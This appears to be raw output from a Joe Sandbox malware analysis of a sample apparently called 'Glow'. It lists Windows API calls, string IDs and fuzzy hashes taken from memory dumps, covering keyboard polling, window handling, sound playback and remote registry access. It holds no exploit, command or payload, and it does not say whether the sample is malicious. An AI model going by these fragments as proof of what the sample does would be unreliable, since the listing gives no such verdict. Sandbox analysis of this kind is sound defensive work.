                                                                                                                                                                          APIs
                                                                                                                                                                          • timeGetTime.WINMM ref: 003EEFCB
                                                                                                                                                                            • Part of subcall function 0039F215: timeGetTime.WINMM(?,?,003EEFEB), ref: 0039F219
                                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 003EEFF8
                                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 003EF01C
                                                                                                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003EF03E
                                                                                                                                                                          • SetActiveWindow.USER32 ref: 003EF05D
                                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003EF06B
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 003EF08A
                                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 003EF095
                                                                                                                                                                          • IsWindow.USER32 ref: 003EF0A1
                                                                                                                                                                          • EndDialog.USER32(00000000), ref: 003EF0B2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                          • String ID: BUTTON
                                                                                                                                                                          • API String ID: 1194449130-3405671355
                                                                                                                                                                          • Opcode ID: ab14d9b959f926434348667e7fa3ec770985f31423c029a32836bc9dc7b8a36d
                                                                                                                                                                          • Instruction ID: 3c40f27f2ea57bae8c286ddfc06646a6fca387eb563a94a56c2add5bf6049144
                                                                                                                                                                          • Opcode Fuzzy Hash: ab14d9b959f926434348667e7fa3ec770985f31423c029a32836bc9dc7b8a36d
                                                                                                                                                                          • Instruction Fuzzy Hash: BD21A4B5500364BFE7226F31ECC9B667B69F74974AB014139F505822F3CBB5CD058619
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 003EF374
                                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 003EF38A
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003EF39B
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 003EF3AD
                                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 003EF3BE
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString$_wcslen
                                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                          • API String ID: 2420728520-1007645807
                                                                                                                                                                          • Opcode ID: f43c1cd6c95462278784dc3e5f18e51601d38b679559e728fcb448e5a2fd504c
                                                                                                                                                                          • Instruction ID: 34fca5ebf12c7120d632cf023cb24bc92fa02d35fcc95fe9bed78e2847073d80
                                                                                                                                                                          • Opcode Fuzzy Hash: f43c1cd6c95462278784dc3e5f18e51601d38b679559e728fcb448e5a2fd504c
                                                                                                                                                                          • Instruction Fuzzy Hash: E111E375A902A93DF722B3628C4AFFFAA7CEBD1B00F00056B7401E60D0DBA41D09C6B4
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 003B3007
                                                                                                                                                                            • Part of subcall function 003B2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4), ref: 003B2D4E
                                                                                                                                                                            • Part of subcall function 003B2D38: GetLastError.KERNEL32(00451DC4,?,003BDB51,00451DC4,00000000,00451DC4,00000000,?,003BDB78,00451DC4,00000007,00451DC4,?,003BDF75,00451DC4,00451DC4), ref: 003B2D60
                                                                                                                                                                          • _free.LIBCMT ref: 003B3013
                                                                                                                                                                          • _free.LIBCMT ref: 003B301E
                                                                                                                                                                          • _free.LIBCMT ref: 003B3029
                                                                                                                                                                          • _free.LIBCMT ref: 003B3034
                                                                                                                                                                          • _free.LIBCMT ref: 003B303F
                                                                                                                                                                          • _free.LIBCMT ref: 003B304A
                                                                                                                                                                          • _free.LIBCMT ref: 003B3055
                                                                                                                                                                          • _free.LIBCMT ref: 003B3060
                                                                                                                                                                          • _free.LIBCMT ref: 003B306E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID: &B
                                                                                                                                                                          • API String ID: 776569668-3208460036
                                                                                                                                                                          • Opcode ID: 8f0639adedf424688b837fb4cb08be95d59c2f9a8a72a66307d9cafcbbd8c89a
                                                                                                                                                                          • Instruction ID: f92ba03dc9e3cf74906cc402516b0f1403df3f379b4ff7b1fb38a6cd9c1d71e7
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f0639adedf424688b837fb4cb08be95d59c2f9a8a72a66307d9cafcbbd8c89a
                                                                                                                                                                          • Instruction Fuzzy Hash: 12119B76600108BFCB02EF94C942DDE3B75EF09354B914AA9FA189F932D631DF519B50
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetKeyboardState.USER32(?), ref: 003EA9D9
                                                                                                                                                                          • SetKeyboardState.USER32(?), ref: 003EAA44
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003EAA64
                                                                                                                                                                          • GetKeyState.USER32(000000A0), ref: 003EAA7B
                                                                                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003EAAAA
                                                                                                                                                                          • GetKeyState.USER32(000000A1), ref: 003EAABB
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 003EAAE7
                                                                                                                                                                          • GetKeyState.USER32(00000011), ref: 003EAAF5
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 003EAB1E
                                                                                                                                                                          • GetKeyState.USER32(00000012), ref: 003EAB2C
                                                                                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003EAB55
                                                                                                                                                                          • GetKeyState.USER32(0000005B), ref: 003EAB63
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: State$Async$Keyboard
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 541375521-0
                                                                                                                                                                          • Opcode ID: dfae506e0f0345405da0cfe02a3a5b0e68fb73958b780944fdd97987af608b81
                                                                                                                                                                          • Instruction ID: 64e40cc1eba5d8e8391a20ef1cdd45cf49ec766d52d04ef9c1f117fd68ec5a90
                                                                                                                                                                          • Opcode Fuzzy Hash: dfae506e0f0345405da0cfe02a3a5b0e68fb73958b780944fdd97987af608b81
                                                                                                                                                                          • Instruction Fuzzy Hash: B651F760904BE929EB37D7A28950BEABFB54F02340F094799D5C21A1C3DB64AB4CC763
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 003E6649
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 003E6662
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 003E66C0
                                                                                                                                                                          • GetDlgItem.USER32(?,00000002), ref: 003E66D0
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 003E66E2
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 003E6736
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 003E6744
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 003E6756
                                                                                                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 003E6798
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 003E67AB
                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 003E67C1
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 003E67CE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3096461208-0
                                                                                                                                                                          • Opcode ID: 9a6873a55e18f6d900385ee7108d01d20f6e7e5a69bf6b9deea67507dcd138ba
                                                                                                                                                                          • Instruction ID: 55e2ec5869777be27e3d1e8060cbeec5f9480818ed6730af9360f5d9843c6a21
                                                                                                                                                                          • Opcode Fuzzy Hash: 9a6873a55e18f6d900385ee7108d01d20f6e7e5a69bf6b9deea67507dcd138ba
                                                                                                                                                                          • Instruction Fuzzy Hash: B3512FB1E00215AFDB18CF69CD86AAEBBB5FB58354F118229F915E62D0D7709D048B50
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00382234: GetWindowLongW.USER32(?,000000EB), ref: 00382242
                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00382152
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                          • Opcode ID: f04f144ab70d42428c23d8b25e13883f38e052db2be04b359ec1afecf7cff92f
                                                                                                                                                                          • Instruction ID: 8cc5397cd65d9492a7478a0f4c02d7c9a68aaa826c39304a10576baadc5dee04
                                                                                                                                                                          • Opcode Fuzzy Hash: f04f144ab70d42428c23d8b25e13883f38e052db2be04b359ec1afecf7cff92f
                                                                                                                                                                          • Instruction Fuzzy Hash: DD41D871500750AFDB226F38DC88FBA7779AB46330F258299FAA2872E1C7318D42D711
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 003C28D1
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003C28EA
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003C28FA
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003C2912
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003C2933
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003811F5,00000000,00000000,00000000,000000FF,00000000), ref: 003C2942
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003C295F
                                                                                                                                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,003811F5,00000000,00000000,00000000,000000FF,00000000), ref: 003C296E
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                          • String ID: (E
                                                                                                                                                                          • API String ID: 1268354404-3218771753
                                                                                                                                                                          • Opcode ID: 4f051145b27814b3ae6a815299097f609815dfba94473ffbad34344c2ad928b3
                                                                                                                                                                          • Instruction ID: cd7aa90fe8d6e0bdaa6df818de2a6b6d59617f1e41a7b2771483db76e5007d08
                                                                                                                                                                          • Opcode Fuzzy Hash: 4f051145b27814b3ae6a815299097f609815dfba94473ffbad34344c2ad928b3
                                                                                                                                                                          • Instruction Fuzzy Hash: 15516970A00305AFDB26EF26CC45FAA7BB9FB48710F108529F946976A0D7B0EC91DB54
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                            • Part of subcall function 003819CD: GetCursorPos.USER32(?), ref: 003819E1
                                                                                                                                                                            • Part of subcall function 003819CD: ScreenToClient.USER32(00000000,?), ref: 003819FE
                                                                                                                                                                            • Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000001), ref: 00381A23
                                                                                                                                                                            • Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000002), ref: 00381A3D
                                                                                                                                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 004195C7
                                                                                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 004195CD
                                                                                                                                                                          • ReleaseCapture.USER32 ref: 004195D3
                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0041966E
                                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00419681
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0041975B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$(E$(E
                                                                                                                                                                          • API String ID: 1924731296-3253568702
                                                                                                                                                                          • Opcode ID: e4617ca28e7489db685bed5b166843237304d5cff91957f7534cb085c383b275
                                                                                                                                                                          • Instruction ID: dc0f13a37a6955af25889cfc2d1c9ff6b5a2c05fd193555b3110ed449e0cdffa
                                                                                                                                                                          • Opcode Fuzzy Hash: e4617ca28e7489db685bed5b166843237304d5cff91957f7534cb085c383b275
                                                                                                                                                                          • Instruction Fuzzy Hash: 93518C70604300AFD704EF20CC56BAA77E5FB88715F500A2EF9969B2E2DB749948CB56
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,003D0D31,00000001,0000138C,00000001,00000000,00000001,?,003FEEAE,00452430), ref: 003EA091
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,003D0D31,00000001), ref: 003EA09A
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003D0D31,00000001,0000138C,00000001,00000000,00000001,?,003FEEAE,00452430,?), ref: 003EA0BC
                                                                                                                                                                          • LoadStringW.USER32(00000000,?,003D0D31,00000001), ref: 003EA0BF
                                                                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003EA1E0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                          • Opcode ID: 189899aeb2f0b7fe2848f10cb6a1eadb1a652a2f9f82e4a74d5dfb59e110b0e2
                                                                                                                                                                          • Instruction ID: a59ba6f29e2d7c0e3ee114f9f94051d5c2e5fd97c6b45f7d3ae91309a6a18ab7
                                                                                                                                                                          • Opcode Fuzzy Hash: 189899aeb2f0b7fe2848f10cb6a1eadb1a652a2f9f82e4a74d5dfb59e110b0e2
                                                                                                                                                                          • Instruction Fuzzy Hash: 93416372800619ABCF06FBE1DD46EEEB778AF14340F5041A5F501BA092DB756F49CB61
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00388577: _wcslen.LIBCMT ref: 0038858A
                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 003E1093
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 003E10AF
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 003E10CB
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 003E10F5
                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003E111D
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E1128
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003E112D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                          • Opcode ID: 1da5abdbeceb0938ed1741daa656c2c0c2278bd14319f8f102ac42c91a388fd4
                                                                                                                                                                          • Instruction ID: 371900110166932e82386c93658ed30d99342d1aa07a13d5c3ba899040113c91
                                                                                                                                                                          • Opcode Fuzzy Hash: 1da5abdbeceb0938ed1741daa656c2c0c2278bd14319f8f102ac42c91a388fd4
                                                                                                                                                                          • Instruction Fuzzy Hash: 39411BB2C10229ABCF12EFA4DC45DEEB7B8FF08740F418169E901A71A1EB719E04CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00414AD9
                                                                                                                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00414AE0
                                                                                                                                                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00414AF3
                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00414AFB
                                                                                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00414B06
                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 00414B10
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00414B1A
                                                                                                                                                                          • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00414B30
                                                                                                                                                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00414B3C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                          • String ID: static
                                                                                                                                                                          • API String ID: 2559357485-2160076837
                                                                                                                                                                          • Opcode ID: 020c1191c132fba36fd183457f36a54fb3f0bfd82534d546b7785ca8b5e1227a
                                                                                                                                                                          • Instruction ID: 82585020ab5557714e43567baded1637c4655970d785c653cb8bfb5c41d8a84c
                                                                                                                                                                          • Opcode Fuzzy Hash: 020c1191c132fba36fd183457f36a54fb3f0bfd82534d546b7785ca8b5e1227a
                                                                                                                                                                          • Instruction Fuzzy Hash: D2319071500219BBDF119FA4CC08FDB3BA9FF0D364F114226FA19A61A0C739D850DB98
                                                                                                                                                                          APIs
                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 004046B9
                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 004046E7
                                                                                                                                                                          • CoUninitialize.OLE32 ref: 004046F1
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040478A
                                                                                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0040480E
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00404932
                                                                                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0040496B
                                                                                                                                                                          • CoGetObject.OLE32(?,00000000,00420B64,?), ref: 0040498A
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 0040499D
                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00404A21
